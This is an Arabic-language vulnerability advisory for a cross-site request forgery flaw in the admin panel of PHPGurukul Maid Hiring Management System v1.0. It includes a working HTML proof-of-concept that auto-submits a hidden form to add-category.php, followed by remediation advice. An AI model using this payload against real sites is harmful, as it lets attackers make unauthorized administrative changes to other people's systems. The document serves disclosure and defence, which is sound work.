
إثبات المفهوم لثغرة CSRF في PHPGurukul Maid Hiring Management System v1.0، يوضح إنشاء فئة غير مصرح بها عبر طلبات ضارة مصممة.
اسم المشروع ورابط المستودع: نظام إدارة توظيف الخادمات باستخدام PHP وMySQL
نوع الثغرة: تزوير الطلب من جانب العميل
الإصدار (الإصدارات) المتأثرة: v1.0
💣وصف الثغرة: توجد ثغرة تزوير الطلب عبر المواقع (CSRF) في لوحة الإدارة لنظام PHPGurukul لإدارة التوظيف، مما يسمح للمهاجم بإضافة فئات توظيف عشوائية عن طريق خداع مسؤول موثوق لزيارة موقع ضار. قد يؤدي ذلك إلى تلوث البيانات وتغييرات غير مصرح بها على مستوى الإدارة.
👩💻التأثير: إنشاء فئات غير مصرح بها
🛜إثبات المفهوم (PoC)

/admin/add-category.php
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


التوصية: تنفيذ رموز CSRF في نماذج الإدارة، وفرض ملفات تعريف الارتباط SameSite، والتحقق من مصدر الطلب لمنع الإجراءات غير المصرح بها.